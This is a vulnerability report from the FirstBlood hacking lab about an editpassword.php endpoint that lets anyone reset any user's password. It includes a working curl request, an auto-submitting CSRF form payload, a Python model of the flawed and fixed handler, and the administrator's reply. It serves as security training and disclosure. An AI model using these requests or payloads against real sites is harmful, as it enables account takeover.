FirstBlood-#386 — Any user can update another's user password via /drpanel/drapi/editpassword.php endpoint
This issue was discovered on FirstBlood v2
On 2021-10-25, panya Level 7 reported:
Steps to reproduce:
- Register a doctor (e.g. with 'admin' as the name and 'test' as the invitation code).
- Don't log in with the provided credentials.
- Update the user password via this request:
curl -X POST 'https://579a3c7897af-panya.a.firstbloodhackers.com/drpanel/drapi/editpassword.php' --data-raw 'username=admin'
It works for any user and returns the newly generated password for the provided username:
Password updated - s3mKUOhRTFvEo6Z
Actual result:
The password of the admin user will be updated to s3mKUOhRTFvEo6Z. An attacker could log in with this password and take over the account.
Expected result:
The /drpanel/drapi/editpassword.php endpoint should properly validate the user role and should be accessible only to admins.
UPDATE:
I'm not sure if it is a different bug or not, but this endpoint also doesn't have any CSRF protection; it could be exploited via this basic PoC:
<body onload="document.forms[0].submit()">
<form method="post" action="https://579a3c7897af-panya.a.firstbloodhackers.com/drpanel/drapi/editpassword.php">
<input type="hidden" name="username" value="admin">
</form>
</body>
By visiting an HTML page with this code, the admin user's password will be updated to a newly generated value.
P1 CRITICAL
Endpoint: /drpanel/drapi/editpassword.php
Parameter: username
Payload: admin
FirstBlood ID: 27
Vulnerability Type: Application/Business Logic
It is possible to edit the admin's password (dradmin) from /drapi/editpassword as it's only looking for the username. Usernames can be enumerated when logging in, as trying 'drAdmin' results in a different error. The username can also be found from FirstBlood v1.
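To make the expected result concrete, here is an added example (not FirstBlood's code, and not the reporter's) that models the editpassword handler in Python: the reported behaviour, which trusts only the POST 'username' field, beside a hardened version that requires an authenticated admin session and a per-session CSRF token compared in constant time. The in-memory user table, the session dictionary, the token helper and the response strings are all constructed for this example; the real endpoint's storage and framework are not known from the report.

```python
"""Model of an editpassword-style handler: reported form vs. hardened form.
Added example, not FirstBlood code. Session/form shapes are assumed."""
import hmac
import secrets

# Constructed in-memory user table standing in for the application's database.
USERS = {
    "dradmin": {"role": "admin", "password": "initial-admin-pw"},
    "admin": {"role": "doctor", "password": "initial-doctor-pw"},
    "alice": {"role": "doctor", "password": "initial-alice-pw"},
}

ALPHABET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"


def generate_password(length: int = 15) -> str:
    """Random alphanumeric password, shaped like the value in the report."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def issue_csrf_token(session: dict) -> str:
    """Store a fresh per-session token the form must echo back (assumed helper)."""
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def edit_password_vulnerable(form: dict) -> str:
    """Behaviour as reported: no session, no role check, no CSRF token.
    Anyone who can POST a username resets that user's password."""
    username = form.get("username", "")
    if username not in USERS:
        return "Unknown user"
    new_pw = generate_password()
    USERS[username]["password"] = new_pw
    return f"Password updated - {new_pw}"


def edit_password_hardened(session: dict, form: dict) -> str:
    """Same action, gated the way the report's expected result asks for."""
    # 1. Authentication: the reporter never logged in; that request must fail.
    if not session.get("user"):
        return "401 Unauthorized"
    # 2. Authorization: only the admin role may reset another user's password.
    if USERS.get(session["user"], {}).get("role") != "admin":
        return "403 Forbidden"
    # 3. CSRF: the auto-submitting form in the PoC cannot know the session token.
    token = form.get("csrf_token", "")
    if not token or not hmac.compare_digest(token, session.get("csrf_token", "")):
        return "403 Forbidden (CSRF)"
    username = form.get("username", "")
    if username not in USERS:
        return "Unknown user"
    new_pw = generate_password()
    USERS[username]["password"] = new_pw
    return f"Password updated - {new_pw}"


if __name__ == "__main__":
    # The reported request: no session at all, only a username.
    print(edit_password_vulnerable({"username": "admin"}))   # succeeds
    print(edit_password_hardened({}, {"username": "admin"}))  # 401
    admin_session = {"user": "dradmin"}
    tok = issue_csrf_token(admin_session)
    print(edit_password_hardened(admin_session, {"username": "admin", "csrf_token": tok}))
```

The three checks are ordered so that the cheapest rejection comes first and each failure returns a distinct status, which also makes unauthenticated or wrong-role POSTs to the endpoint easy to pick out in access logs when reviewing for this class of bug.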
Creator & Administrator
Hi panya, nice find! The intended issue was to be able to log in as 'drAdmin', which could be found from user enumeration (different error message produced) or from FirstBlood v1. However, you are correct that you can update any user's password, but the 'admin' account doesn't actually have any special powers. drAdmin is the root admin